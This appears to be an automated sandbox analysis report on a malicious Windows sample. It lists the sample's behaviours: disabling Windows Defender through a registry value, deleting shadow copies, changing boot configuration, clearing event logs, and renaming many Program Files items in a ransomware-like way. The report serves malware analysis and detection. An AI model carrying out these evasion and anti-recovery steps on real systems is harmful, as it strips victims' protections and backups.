Analysis Overview
SHA256
d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Threat Level: Known bad
The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Deletes shadow copies
Modifies boot configuration data using bcdedit
Clears Windows event logs
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:50
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:50
Reported
2022-01-12 16:55
Platform
win10-en-20211208
Max time kernel
59s
Max time network
128s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_QlNiHN3eTJY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_NxlP0sJ2V5A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_m9iLltahkt80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_52pkZt_1a440.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_X2O-2RKa8jk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tFCAC2h44gs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_pKeeltUzQik0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_rXqCKXyfSOc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_DnFqgc19FS40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_dCDqfaxO3pA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_RfRI_CLJMuk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Yg0hVlD8qaM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_sChRZzT8NSw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Jr7pXnUQp8I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\Content.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_lG9lEzz2aRk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Garden.jpg | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTest-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_uI6a0Yna4Ug0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_aIMX2VBYN9A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_8Tkhy0jHrBs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_mFWDfzw05tM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_AYp3I1izMaU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_awc78q9Cy7s0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_2OsY5B-qbgw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_65pzqDrKC-U0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_CldZ8-Ka4P00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_DcYAXZEQcvM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_eS_UvneLctI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_6dmmqIGe7tI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_V-CiOBIFDRo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Phh514auOfY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_FEEI_wn2UOY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_VxUguo-IQAc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_AYs9KrOBvwQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_CST4TT1xeBA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_xyzfjPuCzws0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tMShgLgnvpM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_EbCjtQ0GFY80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_V5H1FqjYRog0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_de_DE.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_8JZX1AVwIsE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_fU3vuvwLZeI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_68xGEKR2pbs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_wp2nGckLzbk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_hrBge1nk5fA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_mj8RdPap-mQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_WhwN7eFi6Ek0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_cGbXZZBWW6M0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_pS0Tph2rMRQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp-ul-phn.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_P-xlCFq9IUE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_ummp9E64X8A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_2_qx-4pC0Hg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_vFkXe2j3g8w0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_IQRmwZuUSJ40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-ppd.xrm-ms._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_1hCUWmsG8s00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\AssertPush.AAC._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_HVIJVQ00MoE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\LICENSE._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_tf9kwYbl4hQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\LINEAR_RGB.pf._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_SYUzxddIn500.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_Q9hlb-hUXBQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar._b_hnfIv3eMJ4YEsY-cnzCHL08NBp2z-DPkFT44K0w7_30q1iJAnn3I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
